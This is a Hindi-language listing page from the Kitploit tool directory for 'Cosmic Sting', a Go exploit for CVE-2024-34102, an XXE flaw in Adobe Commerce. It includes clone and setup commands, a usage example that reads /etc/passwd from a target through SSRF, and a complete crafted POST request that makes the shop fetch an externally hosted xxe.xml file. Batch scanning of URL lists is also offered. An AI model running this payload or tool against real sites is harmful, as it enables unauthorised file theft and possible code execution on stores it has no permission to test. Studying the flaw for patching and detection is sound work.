Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-34102 — Go-आधारित शोषण CVE-2024-34102 के लिए, Adobe Commerce में एक XXE कमजोरी जो रिमोट कोड निष्पादन की ओर ले जाती है। SSRF फ़ाइल पढ़ने के साथ एकल और बैच URL स्कैनिंग का समर्थन करता है। | Kitploit
उपकरण/GitHubGitHub/kento-sec/cve-2024-34102
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubkento-sec/cve-2024-34102

CVE-2024-34102

Go-आधारित शोषण CVE-2024-34102 के लिए, Adobe Commerce में एक XXE कमजोरी जो रिमोट कोड निष्पादन की ओर ले जाती है। SSRF फ़ाइल पढ़ने के साथ एकल और बैच URL स्कैनिंग का समर्थन करता है।

रिपॉजिटरी देखें
31 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Cosmic Sting: CVE-2024-34102 शोषक

Cosmic Sting एक Go-आधारित उपकरण है जो CVE-2024-34102, दूरस्थ कोड निष्पादन भेद्यता का शोषण करने के लिए डिज़ाइन किया गया है।

CVE-2024-34102 विवरण

Adobe Commerce संस्करण 2.4.7, 2.4.6-p5, 2.4.5-p7, 2.4.4-p8 और उससे पहले के संस्करण XML External Entity Reference ('XXE') भेद्यता के अनुचित प्रतिबंध से प्रभावित हैं, जो मनमाना कोड निष्पादन का कारण बन सकता है। एक हमलावर बाहरी संस्थाओं को संदर्भित करने वाला एक गढ़ा हुआ XML दस्तावेज़ भेजकर इस भेद्यता का शोषण कर सकता है। इस मुद्दे के शोषण के लिए उपयोगकर्ता की सहभागिता की आवश्यकता नहीं है।

पूर्वापेक्षाएँ

  • Go (1.16 या उच्चतर)

स्थापना

  1. रिपॉजिटरी क्लोन करें:

    git clone https://github.com/bughuntar/CVE-2024-34102.git &&
    cd CVE-2024-34102
    
  2. निर्भरताएँ स्थापित करें (यदि कोई हों):

    go version &&
    go mod init cosmic_sting &&
    go get github.com/fatih/color &&
    go get github.com/google/uuid &&
    go get github.com/urfave/cli/v2
    

एकल URL

एकल URL के साथ उपकरण चलाने के लिए:

go run cosmic_sting.go -u "http://example.com" -f "/etc/passwd"

फ़्लैग्स

  • -u, --url : शोषण करने के लिए एकल URL।
  • -f, --file : SSRF के माध्यम से पढ़ने के लिए फ़ाइल।
  • -l, --list : शोषण करने के लिए URL की सूची वाली फ़ाइल।

गढ़ा हुआ XML DTD फ़ाइल POST अनुरोध:

POST /rest/V1/guest-carts/1/estimate-shipping-methods HTTP/1.1
Host: {{hostname}}
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Connection: close
Content-Type: application/json
Content-Length: 187

{"address":{"totalsCollector":{"collectorList":{"totalCollector":{"sourceData":{"data":"https://{{hostedXMLfile.com}}/xxe.xml","dataIsURL":true,"options":1234}}}}}}

लाइसेंस

यह प्रोजेक्ट लाइसेंस प्राप्त नहीं है, केवल व्यक्तिगत प्रोजेक्ट के लिए बनाया गया है।

योगदान

योगदान का स्वागत है! कृपया किसी भी बदलाव के लिए एक मुद्दा खोलें या एक पुल अनुरोध सबमिट करें।

अस्वीकरण

यह उपकरण केवल शैक्षिक उद्देश्यों के लिए है। इसका जिम्मेदारी से उपयोग करें और केवल उन सिस्टम पर जिनका परीक्षण करने की अनुमति है।

लेखक

Professor the Hunter --> मुझे Twitter पर फॉलो करें

CVE-2024-34102

टूल डाउनलोड करें